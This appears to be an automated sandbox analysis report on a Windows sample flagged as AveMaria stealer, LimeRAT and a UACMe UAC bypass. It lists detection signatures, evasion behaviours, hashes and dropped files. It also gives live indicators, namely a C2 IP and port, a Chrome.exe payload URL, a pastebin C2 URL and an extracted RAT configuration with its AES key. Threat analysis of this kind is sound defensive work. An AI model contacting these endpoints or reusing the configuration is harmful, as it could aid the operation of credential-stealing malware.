Windows Analysis Report
DocumentoSENAMHI20222103.exe

Overview

General Information

Sample Name: DocumentoSENAMHI20222103.exe
Analysis ID: 593268
MD5: 81ba3d2de48272d692c4e6604e6b1db9
SHA1: 921e7008881d5e0e9a788ee310ddef60b343c647
SHA256: eef5ae48384a5c5dff5d4c7b1a768c4eb1fe5d3df0347c85c9c1b404327dbba9
Infos:

Detection

AveMaria LimeRAT UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected LimeRAT
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Hides that the sample has been downloaded from the Internet (zone.identifier)
Connects to a pastebin service (likely for C&C)
Uses schtasks.exe or at.exe to add and modify task schedules
Sigma detected: Suspicious Add Scheduled Task From User AppData Temp
Protects its processes via BreakOnTermination flag
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Sigma detected: Suspicious Add Scheduled Task Parent
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://172.111.242.20/Chrome.exeTTC: Avira URL Cloud: Label: malware
Source: http://172.111.242.20/Chrome.exer Avira URL Cloud: Label: malware
Source: 172.111.242.20 Avira URL Cloud: Label: malware
Source: http://172.111.242.20/Chrome.exelr Avira URL Cloud: Label: malware
Source: http://172.111.242.20/Chrome.exen Avira URL Cloud: Label: malware
Source: http://172.111.242.20/Chrome.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Avira: detection malicious, Label: TR/Spy.Gen8
Found malware configuration
Source: 18.2.chrome.exe.760000.0.unpack Malware Configuration Extractor: LimeRAT {"C2 url": "https://pastebin.com/raw/03PEm7js", "AES Key": "150797", "ENDOF": "|'N'|", "Seprator": "|'L'|", "Install File": "True", "Install Dir": "temp", "Version": "v4.0"}
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack Malware Configuration Extractor: AveMaria {"C2 url": "172.111.242.20", "port": 2031}
Multi AV Scanner detection for submitted file
Source: DocumentoSENAMHI20222103.exe ReversingLabs: Detection: 16%
Yara detected AveMaria stealer
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Temp\IconLib.dll Metadefender: Detection: 31% Perma Link
Source: C:\Users\user\AppData\Local\Temp\IconLib.dll ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\chrome.exe ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe ReversingLabs: Detection: 92%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack Avira: Label: TR/Redcap.ghjpt
Source: 1.0.DocumentoSENAMHI20222103.exe.bd0000.0.unpack Avira: Label: ADWARE/Adware.Gen8
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack Avira: Label: TR/Patched.Ren.Gen3
Source: 1.2.DocumentoSENAMHI20222103.exe.bd0000.0.unpack Avira: Label: ADWARE/Adware.Gen8

Exploits
barindex
Yara detected UACMe UAC Bypass tool
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83503482474.00000000014EF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DocumentoSENAMHI20222103.exe PID: 6576, type: MEMORYSTR
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.23.98.190:443 -> 192.168.11.20:49764 version: TLS 1.0
Uses 32bit PE files
Source: DocumentoSENAMHI20222103.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: DocumentoSENAMHI20222103.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: vcruntime140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: msvcp140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: DocumentoSENAMHI20222103.exe
Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: USB.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdbd source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: PIN.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: msvcp140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81029831720.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81028272449.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81023544899.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81027987212.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81029572816.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81030566751.0000000005E59000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: PIN.pdbX source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: wuser32.pdbUGP source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BDA22B FindFirstFileExW, 1_2_00BDA22B

Networking
barindex
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: pastebin.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://pastebin.com/raw/03PEm7js
Source: Malware configuration extractor URLs: 172.111.242.20
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /raw/03PEm7js HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Downloads executable code via HTTP
